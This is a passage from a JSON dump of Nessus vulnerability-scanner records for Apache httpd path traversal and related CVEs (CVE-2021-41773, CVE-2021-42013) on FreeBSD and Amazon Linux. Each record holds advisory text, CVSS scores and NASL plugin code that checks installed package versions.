outside the directories configured by Alias-like\ndirectives.\n\nIf files outside of these directories are not protected by the usual\ndefault configuration 'require all denied', these requests can\nsucceed. If CGI scripts are also enabled for these aliased pathes,\nthis could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\nearlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies,\nFernando Munoz from NULL Life CTF Team, and Shungo Kumasaka\");\n # https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c28c816\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24>=2.4.49<2.4.51\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:56:54", "description": "The version of Apache httpd installed on the remote host is 2.4.49 prior to 2.4.51. It is, therefore, affected by a vulnerability as referenced in the 2.4.51 advisory.\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-08-31T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_51.NASL", "href": "https://www.tenable.com/plugins/nessus/153952", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153952);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache httpd installed on the remote host is 2.4.49 prior to 2.4.51. It is, therefore, affected by a\nvulnerability as referenced in the 2.4.51 advisory.\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a\n path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.51 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nvar constraints = [\n { 'min_version' : '2.4.49', 'fixed_version' : '2.4.51' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:57:27", "description": "The version of httpd24 installed on the remote host is prior to 2.4.51-1.94. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS-2021-1543 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-17T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd24 (ALAS-2021-1543)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd24", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_md", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:mod24_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2021-1543.NASL", "href": "https://www.tenable.com/plugins/nessus/154188", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2021-1543.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154188);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-33193\",\n \"CVE-2021-34798\",\n \"CVE-2021-36160\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2021-41524\",\n \"CVE-2021-41773\",\n \"CVE-2021-42013\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1543\");\n script_xref(name:\"IAVA\", value:\"2021-A-0440-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0451-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 (ALAS-2021-1543)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of httpd24 installed on the remote host is prior to 2.4.51-1.94. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS-2021-1543 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead\n to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP\n Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and\n crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request\n processing, allowing an external source to DoS the server. This requires a specially crafted request. The\n vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could\n use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This\n issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found\n to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker\n could use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache\n 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2021-1543.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-33193\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-34798\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-36160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-39275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-40438\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41524\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41773\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-42013\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update httpd24' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'httpd24-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-debuginfo-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-debuginfo-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-devel-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-devel-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-manual-2.4.51-1.94.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-tools-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-tools-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ldap-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ldap-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_md-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_md-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_proxy_html-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_proxy_html-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_session-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_session-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ssl-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ssl-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd24 / httpd24-debuginfo / httpd24-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:57:10", "description": "The version of httpd installed on the remote host is prior to 2.4.51-1. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2-2021-1716 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : httpd (ALAS-2021-1716)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-filesystem", "p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:mod_ldap", 